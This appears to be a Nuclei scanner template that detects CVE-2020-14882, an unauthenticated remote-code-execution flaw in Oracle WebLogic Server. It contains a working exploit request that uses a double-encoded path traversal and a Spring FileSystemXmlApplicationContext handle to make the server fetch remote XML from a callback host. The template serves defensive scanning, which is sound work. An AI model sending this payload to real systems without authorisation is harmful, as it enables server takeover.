id: CVE-2020-14882 info: name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass) author: dwisiswant0 severity: critical reference: - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf - https://www.oracle.com/security-alerts/cpuoct2020.html - https://twitter.com/jas502n/status/1321416053050667009 - https://youtu.be/JFVDOIL0YtA - https://github.com/jas502n/CVE-2020-14882#eg description: An easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. remediation: Apply the appropriate security update. tags: cve,cve2020,oracle,rce,weblogic,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2020-14882 requests: - raw: - | POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=utf-8 _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{{interactsh-url}}") matchers-condition: and matchers: - type: word part: header words: - "ADMINCONSOLESESSION" - type: word part: interactsh_protocol words: - "http" # Enhanced by mp on 2022/02/08